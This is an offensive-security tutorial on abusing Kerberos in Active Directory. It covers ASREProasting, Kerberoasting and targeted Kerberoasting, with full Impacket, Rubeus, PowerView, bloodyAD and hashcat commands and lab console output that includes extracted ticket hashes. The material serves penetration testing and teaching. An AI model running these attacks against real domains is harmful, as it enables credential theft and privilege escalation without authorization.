Kerberos
Abusing the ticket-based authentication and authorization protocol that governs the operation of Active Directory
Kerberos is a ticket-based network protocol that enables centralized authentication and authorization management in a network. This is the process a client goes through to access a service in a Kerberos network:
- Client requests a Ticket Granting Ticket (TGT) from the Auethenitcation Service (AS) of the Key Distribution Center (KDC) (AS-REQ).
- The KDC authenticates the client, then sends back a response (AS-REP).
- Client decrypts the AS-REP using the hash of their password, obtaining the TGT.
- Client hands the TGT to the Ticket Granting Service (TGS) alongside the service principal name (SPN) of the service they are attempting to access (TGS-REQ).
- TGS after verifying the TGT and ensure the client can access the SPN, then responds to the client’s request (TGS-REP).
- Client decrypts TGS-REP, obtaining the service ticket.
- Client hands the service ticket to the service.
- The service decrypts the service ticket using the password hash of its service account and verifies its content, then grants the client access.
Microsoft’s implementation of Kerberos sits at the center of Active Directory. The Domain Controllers (DC) acts as the KDC, enabling both centralized storage of credentials as well as user privileges and permissions. At the same time, different steps within the Kerberos authentication flow can be leveraged by attackers to obtain access to accounts and services. Attackers can use responses from the KDC to crack the target’s password offline (roasting attacks), extract Kerberos tickets from compromised machines, or forge tickets to escalate their privileges.
1 - ASREProasting
Take advantage of users with no Kerberos pre-authentication requirements and recover their password
Theory
Normally, in order for users to obtain their Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), they have to verify their identity via pre-authentication. If the verification is successful, the KDC would then send a TGT back inside its Authentication Service Response (AS-REP), which is encrypted with a key derived from the user’s password.
Active Directory has an option inside the user’s User Account Control (UAC) settings called Do not require Kerberos pre-authentication. As its name suggests, the KDC would response with the AS-REP containing the user’s encrypted TGT without first verifying the user’s identity.
If this option is enabled on the target user, the Attacker can request a TGT for the user without provide the KDC with their password, then use brute-force attack to decrypt the AS-REP to obtain the user’s cleartext password.
The only requirement for this attack is that we control a domain user with at least standard privileges.
Linux Perspective
From a Linux attacker machine, GetNPUsers.py from Impacket can be used to both enumerate and obtain the encrypted AS-REP. We run the Python script without the -request to enumerate all users with Do not require Kerberos pre-authentication enabled.
GetNPUsers.py -dc-ip <dc_ip> <domain>/<user>:<password>
╭─brian@rx-93-nu ~
╰─$ GetNPUsers.py -dc-ip 10.10.0.3 GUNDAM.LOCAL/amuro.ray:Password1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Name MemberOf PasswordLastSet LastLogon UAC
------------ -------- -------------------------- -------------------------- --------
hathaway.noa 2026-04-09 20:36:53.519673 2026-04-16 16:46:31.017931 0x410200
To carry out the ASREProasting process and obtain the AS-REP blob, we use the -request flag.
GetNPUsers.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
╭─brian@rx-93-nu ~
╰─$ GetNPUsers.py -request -dc-ip 10.10.0.3 GUNDAM.LOCAL/amuro.ray:Password1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Name MemberOf PasswordLastSet LastLogon UAC
------------ -------- -------------------------- -------------------------- --------
hathaway.noa 2026-04-09 20:36:53.519673 2026-04-16 16:46:31.017931 0x410200
$krb5asrep$23$hathaway.noa@GUNDAM.LOCAL:fe3a480111d9c7a40d9760a93c2bee78$93782918d8a804f3be8381ee86e3b5562a090c76d200ab3d78c2040dc46e068bd04fb2623353fa69cd795ba9411013218b55a66def59be3d90089e0eec8c2eb1bfd19ff5775d867c3d6ad4892fccc2c71538ee6bf515abd1524cf64eacdde3ae8016180a7192ad67a7b78e43a8e1ccebcb0aca9726bc42f6075693276a9c87cf6b9e44a2889bf3a6b6fe5f08a0d42cb9dd80fd57d9bca78751e8e8119bbfc775945b81cf813ffed75fc7fad8dff0ac6f9f4be2e4e51082cd7ccc85e6d8dd1d315adeecd79a5f416888196313d16aeb721f8a5b4e23e3b9fa8e01baf2e20ea9ff347987d0510d8e8f661d1983966d0fb6ebdf621831a6b57fe6738119
Windows Perspective
From a Windows domain computer, we can use PowerView’s Get-DomainUser with option -PreauthNotRequired to enumerate ASREProastable users.
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
PS C:\research> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
samaccountname : hathaway.noa
userprincipalname : hathaway.noa@GUNDAM.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
ASREProasting can be carried on from Windows using Rubeus and the asreproast subcommand.
.\Rubeus.exe asreproast /user:<target_user> /nowrap /format:hashcat
Cracking AS-REP
Hashcat mode 18200 may be used to crack the password from a AS-REP ($krb5asrep$23$).
hashcat -m 18200 <asrep_file> <wordlist>
2 - Kerberoasting
The classic AD privilege escalation technique to crack the passwords of service accounts offline
Kerberoasting is a privilege escalation technique for Active Directory credited to security researcher Tim Medin, who presented the attack back in 2014. The attack targets domain accounts with Service Principal Names (SPN), which are unique identifiers that Kerberos uses to map a service to a domain service account in whose context the service is running.
Theory
Once the user completes pre-authentication, the Kerberos KDC (Key Distribution Center) issues the user a Ticket Granting Ticket (TGT). The user can then use the TGT to obtain a service ticket from the Ticket Granting Service (TGS) at the KDC. The service ticket is issued for a particular service principal, whose password hash is used to encrypt the service ticket. Users can then use the service ticket to authenticate to the service principal to access the service.
From an attacker’s perspective, if we can obtain a valid TGT for any user on the domain, we could use it to obtain the service ticket. Then, we extract the encrypted portion and crack it offline to obtain the cleartext password of the service account, allowing us to authenticate to the domain as that service account.
Thus, the attack requires us to have access to a domain user, with any level of privileges within the domain. Additionally, there also must be at least one account with SPN configured other than the built-in krbtgt account that operates the KDC. The success of the attack depends on the strength of the password set in the service accounts we choose to attack.
Attack from Linux
The GetUserSPNs.py script from Impacket is great for enumerarting service accounts and Kerberoasting them. We can run the script with only the domain name, username, password and optionally the domain controller IP address specified using -dc-ip.
GetUserSPNs.py -dc-ip 10.10.0.3 <domain>/<user>:<password>
This gives us a list of domain service accounts alongside their SPNs.
╭─brian@rx-93-nu ~
╰─$ GetUserSPNs.py -dc-ip 10.10.0.3 gundam.local/amuro.ray:Password1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------------ ------- -------------------------------------------------------------------- -------------------------- -------------------------- ----------
MSSQLSvc/RA-CAILUM.GUNDAM.local:1433 svc_sql CN=Group Policy Creator Owners,OU=Security Groups,DC=GUNDAM,DC=local 2025-06-06 00:13:47.605590 2026-04-07 16:16:56.632421
MSSQLSvc/RA-CAILUM.GUNDAM.local:SQLEXPRESS svc_sql CN=Group Policy Creator Owners,OU=Security Groups,DC=GUNDAM,DC=local 2025-06-06 00:13:47.605590 2026-04-07 16:16:56.632421
We use -request option to request service ticket(s) and extract the encrypted portions.
GetUserSPNs.py -request -dc-ip 10.10.0.3 <domain>/<user>:<password>
Optionally, we may request service ticket for a specific account using -request-user.
GetUserSPNs.py -request -request-user <target_user> -dc-ip 10.10.0.3 <domain>/<user>:<password>
GetUserSPNs.py automatically request tickets for the service account(s), and extracts the encrypted portion in JtR/hashcat format that be copied and cracked directly. We can also use -outputfile to specify a filename for GetUserSPNs.py to write the encrypted portions to.
╭─brian@rx-93-nu ~
╰─$ GetUserSPNs.py -dc-ip 10.10.0.3 gundam.local/amuro.ray:Password1 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------------ ------- -------------------------------------------------------------------- -------------------------- -------------------------- ----------
MSSQLSvc/RA-CAILUM.GUNDAM.local:1433 svc_sql CN=Group Policy Creator Owners,OU=Security Groups,DC=GUNDAM,DC=local 2025-06-06 00:13:47.605590 2026-04-07 16:16:56.632421
MSSQLSvc/RA-CAILUM.GUNDAM.local:SQLEXPRESS svc_sql CN=Group Policy Creator Owners,OU=Security Groups,DC=GUNDAM,DC=local 2025-06-06 00:13:47.605590 2026-04-07 16:16:56.632421
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_sql$GUNDAM.LOCAL$gundam.local/svc_sql*$[...]
Attack from Windows
Kerberoasting can also be done if we can log in to a machine joined to the target domain as a domain user. Kerberoasting from the Windows perspective is drastically simplified with the use of tools, but be aware of anti-virus and detection if those are in play during an engagement.
Using Rubeus
Rubeus is a multi-purpose tool written in C# that focuses on Kerberos interaction. To use Rubeus for kerberoasting, we run Rubeus with kerberoast subcommand. The /nowrap option allows us to easily copy the service ticket to a file for cracking.
PS C:\research> .\Rubeus.exe kerberoast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_sql
[*] DistinguishedName : CN=SQL Service,CN=Users,DC=GUNDAM,DC=local
[*] ServicePrincipalName : MSSQLSvc/RA-CAILUM.GUNDAM.local:1433
[*] PwdLastSet : 6/6/2025 5:13:47 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svc_sql$GUNDAM.local$MSSQLSvc/RA-CAILUM.GUNDAM.local:1433*$[...]
Rubeus also support using /ldapfilter option to target specific accounts. For example, we can use 'admincount=1' option to target high-value accounts, or use 'samaccountname=svc_sql' to target specific users.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /ldapfilter='samaccountname=svc_sql' /nowrap
Using PowerView
Beyond being a powerful Swiss Army Knife for AD enumeration, PowerView can also be used for Kerberoasting.
We can first enumerate domain accounts with SPN using Get-DomainUser * -spn:
PS C:\research> Get-DomainUser * -spn | select samaccountname
samaccountname
--------------
krbtgt
svc_sql
Next, we target a specific SPN account to obtain a service ticket for it.
PS C:\research> Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
SamAccountName : svc_sql
DistinguishedName : CN=SQL Service,CN=Users,DC=GUNDAM,DC=local
ServicePrincipalName : MSSQLSvc/RA-CAILUM.GUNDAM.local:1433
TicketByteHexStream :
Hash : $krb5tgs$23$*svc_sql$GUNDAM.local$MSSQLSvc/RA-CAILUM.GUNDAM.local:1433*$[...]
Cracking Service Ticket
With the service ticket obtained, hashcat can be used to crack the password for the target acount. We should note the encrypt algorithm used for the service ticket, which is indicated by its prefix. Kerberoasting tools like GetUserSPNs.py or Rubeus typically requests RC4 when performing service ticket requests, and if accepted by the KDC, we get a service ticket starting with $krb5tgs$23$* (type 23). In that case, we may use mode 13100 to crack the ticket.
hashcat -m 13100 -O <service_ticket_file> <wordlist>
In other instances where RC4 Encryption is disabled, we may receive ticket starting with $krb5tgs$17$* (type 17) or $krb5tgs$18$* (type 18), indicating the use of AES-128 and AES-256 encryption for the service ticket respectively. Cracking service tickets with AES encryption types are typically more time consuming than those with RC4 encryption, but not impossible.
If you wish to proceed, hashcat mode 19600 can be used to crack type 17 TGS-REP, and mode 19700 to crack type 18 TGS-REP.
hashcat -m 19600 -O <service_ticket_file> <wordlist>
hashcat -m 19700 -O <service_ticket_file> <wordlist>
Targeted Kerberoasting
Targeted Kerberoasting is a type of Kerberoasting used to abuse ACLs over a user object. If the principal we control have GenericWrite or GenericAll access rights over a target user, or we have explicit WriteProperty permission on the targer user’s servicePrincipalName, we may create a fake service principal name for the target user and Kerberoast it for the user’s cleartext password.
We can use PowerView function Set-DomainObject for this purpose.
Set-DomainObject -Credential <cred_object> -Identity <target_user> -SET @{serviceprincipalname='notahacker/LEGIT'}
Alternatively, bloodyAD may be used from the Linux perspective.
bloodyAD -d <domain> --host <dc_fqdn> -u <user> -p <password> set object <target_user> servicePrincipalName -v 'fake/SPN'
From there on, we may Kerberoast the target user as if it was a normal service account.
References and Further Reading